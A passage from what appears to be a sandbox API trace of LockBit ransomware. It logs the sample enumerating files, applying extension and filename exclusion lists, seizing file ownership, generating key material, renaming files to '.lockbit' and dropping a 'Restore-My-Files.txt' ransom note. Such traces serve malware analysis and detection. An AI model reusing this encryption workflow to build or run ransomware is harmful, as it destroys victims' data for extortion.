pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0082.020] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png") returned=".png" [0082.020] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.020] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.020] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.020] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.021] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.021] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.021] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png.lockbit") returned 90 [0082.021] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.030] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.030] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.030] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.030] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.031] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.031] RtlFreeAnsiString (AnsiString="\\") [0082.031] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.031] malloc (_Size=0x200) returned 0x77d800 [0082.031] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.031] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.031] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.031] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.032] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.032] CloseHandle (hObject=0x3bc) returned 1 [0082.032] free (_Block=0x77d800) [0082.032] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.033] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.033] malloc (_Size=0x40068) returned 0x3d70048 [0082.033] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=108525) returned 1 [0082.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.034] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.102] malloc (_Size=0xca) returned 0x1ff1e60 [0082.102] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0xc0000008 [0082.109] free (_Block=0x1ff1e60) [0082.109] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0082.109] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0082.109] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.109] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710b1352, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710b1352, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="scrapbook.png", cAlternateFileName="")) returned 1 [0082.109] lstrcmpiW (lpString1=".", lpString2="scrapbook.png") returned -1 [0082.109] lstrcmpiW (lpString1="..", lpString2="scrapbook.png") returned -1 [0082.109] PathFindExtensionW (pszPath="scrapbook.png") returned=".png" [0082.109] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.109] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.109] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.110] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.110] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.111] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.111] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.111] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.111] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="scrapbook.png") returned -1 [0082.111] lstrcmpiW (lpString1="ntldr", lpString2="scrapbook.png") returned -1 [0082.111] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="scrapbook.png") returned -1 [0082.111] lstrcmpiW (lpString1="bootsect.bak", lpString2="scrapbook.png") returned -1 [0082.111] lstrcmpiW (lpString1="autorun.inf", lpString2="scrapbook.png") returned -1 [0082.111] lstrcmpiW (lpString1="thumbs.db", lpString2="scrapbook.png") returned 1 [0082.111] lstrcmpiW (lpString1="iconcache.db", lpString2="scrapbook.png") returned -1 [0082.111] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0082.111] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned=".png" [0082.112] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.112] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.112] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.112] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.112] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.112] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.112] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.113] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.113] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.113] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.113] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.113] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png.lockbit") returned 75 [0082.113] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.113] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.114] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.114] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.114] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.114] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.114] RtlFreeAnsiString (AnsiString="\\") [0082.114] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.114] malloc (_Size=0x200) returned 0x77d800 [0082.114] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.114] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.115] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.115] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.115] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.115] CloseHandle (hObject=0x3bc) returned 1 [0082.115] free (_Block=0x77d800) [0082.115] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.116] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.116] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.116] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=20346) returned 1 [0082.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.117] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.119] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.119] malloc (_Size=0xac) returned 0x1ff1e60 [0082.119] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xac, FileInformationClass=0xa) returned 0x0 [0082.119] free (_Block=0x1ff1e60) [0082.119] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0082.119] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0082.120] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.120] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712c6668, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712c6668, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x390c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_content-background.png", cAlternateFileName="")) returned 1 [0082.120] lstrcmpiW (lpString1=".", lpString2="Title_content-background.png") returned -1 [0082.120] lstrcmpiW (lpString1="..", lpString2="Title_content-background.png") returned -1 [0082.120] PathFindExtensionW (pszPath="Title_content-background.png") returned=".png" [0082.120] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.120] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.120] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.121] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.121] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.122] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.122] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_content-background.png") returned -1 [0082.122] lstrcmpiW (lpString1="ntldr", lpString2="Title_content-background.png") returned -1 [0082.122] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_content-background.png") returned -1 [0082.122] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_content-background.png") returned -1 [0082.122] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_content-background.png") returned -1 [0082.122] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_content-background.png") returned -1 [0082.122] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_content-background.png") returned -1 [0082.122] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0082.122] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png") returned=".png" [0082.122] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.122] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.122] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.122] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.123] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.123] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.123] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.123] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.123] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.123] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.123] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.124] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.124] wsprintfW (in: param_1=0x3d6a668, 